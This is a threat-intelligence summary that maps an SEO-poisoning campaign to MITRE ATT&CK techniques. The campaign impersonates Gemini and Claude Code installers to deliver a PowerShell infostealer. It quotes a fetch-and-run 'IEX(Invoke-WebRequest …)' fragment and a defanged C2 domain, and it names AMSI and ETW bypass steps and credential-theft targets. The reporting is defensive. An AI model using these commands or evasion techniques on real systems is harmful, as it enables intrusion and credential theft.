SEO poisoning campaign leverages Gemini and Claude Code impersonation to deliver infostealer

MITRE Techniques

• [T1189 ] Drive-by Compromise – Victims were led to attacker-controlled installation pages through poisoned search results (‘The infection chain begins with a Google search… Threat actors use SEO poisoning to surface a fake domain at the top of search results’).
• [T1608.006 ] Stage Capabilities: SEO Poisoning – Malicious domains were promoted above legitimate vendor pages (‘Threat actors use SEO poisoning to surface a fake domain at the top of search results’).
• [T1059.001 ] Command and Scripting Interpreter: PowerShell – The payloads were executed entirely in memory with PowerShell (‘executes entirely in memory through PowerShell’).
• [T1204.001 ] User Execution: Malicious Link – Users clicked through from search results to malicious sites (‘The victim clicks through, lands on a malicious page’).
• [T1204.002 ] User Execution: Malicious File – Users were induced to paste and run a one-line PowerShell command (‘prompts the user to copy and paste a PowerShell command into their terminal’).
• [T1027 ] Obfuscated Files or Information – The script was heavily obfuscated with junk branches (‘approximately 6,800 lines of junk code branches’).
• [T1140 ] Deobfuscate/Decode Files or Information – The C2 task list was decrypted at runtime (‘The implant decrypts it, splits it into records’).
• [T1562.001 ] Impair Defenses: Disable or Modify Tools – AMSI was bypassed to prevent script scanning (‘the script… neutralize Microsoft Windows endpoint visibility by disabling… AMSI’).
• [T1562.006 ] Impair Defenses: Indicator Blocking – ETW telemetry was suppressed by patching PowerShell logging (‘patches the PSEtwLogProvider.m_enabled flag’).
• [T1497.001 ] Virtualization/Sandbox Evasion: System Checks – The malware checked for qemu-ga to avoid virtualized analysis (‘includes a qemu-ga string check as a basic anti-sandbox gate’).
• [T1218 ] System Binary Proxy Execution – Shell.Application was used to launch hidden PowerShell (‘instantiates a Shell.Application COM object and calls ShellExecute with window style 0’).
• [T1057 ] Process Discovery – The Restart Manager API enumerated running processes (‘Leverages the Restart Manager API… to enumerate running processes’).
• [T1083 ] File and Directory Discovery – The stealer recursively enumerated user documents (‘Recursive listing of .txt and .docx files across Desktop, Documents, and Downloads’).
• [T1555.003 ] Credentials from Web Browsers – Browser login data, cookies, autofill, and form history were extracted (‘Chromium-family browsers… Firefox’).
• [T1555.004 ] Credentials from Windows Credential Manager – Stored Windows credentials were harvested via CredEnumerate (‘call CredEnumerate against Windows Credential Manager’).
• [T1539 ] Steal Web Session Cookie – Session cookies from collaboration apps were stolen (‘Slack… Teams… Discord… Mattermost’).
• [T1552.001 ] Unsecured Credentials: Credentials in Files – Credentials and keys were taken from config files (‘OpenVPN config files with embedded key material’).
• [T1552.002 ] Unsecured Credentials: Credentials in Registry – Saved sessions and passwords were pulled from registry locations (‘WinSCP stored passwords from the registry’, ‘PuTTY saved sessions’).
• [T1005 ] Data from Local System – Local synced cloud directories and user files were collected (‘Enumeration of locally synced directories for Proton Drive, iCloud Drive, Google Drive, MEGA, and OneDrive’).
• [T1071.001 ] Application Layer Protocol: Web Protocols – C2 communications used HTTP endpoints (‘communicates with events.msft23[.]com over three URL endpoints’).
• [T1573 ] Encrypted Channel – Exfiltrated data and tasking were protected with encryption (‘exfiltrated data in encrypted form’, ‘RSA-encrypted task list’).
• [T1105 ] Ingress Tool Transfer – Operator-supplied URLs were fetched and run on the victim host (‘run the operator-supplied URL via powershell.exe -command IEX(Invoke-WebRequest … )’).
• [T1041 ] Exfiltration Over C2 Channel – Stolen data was sent to the /process endpoint (‘uploads exfiltrated host data’).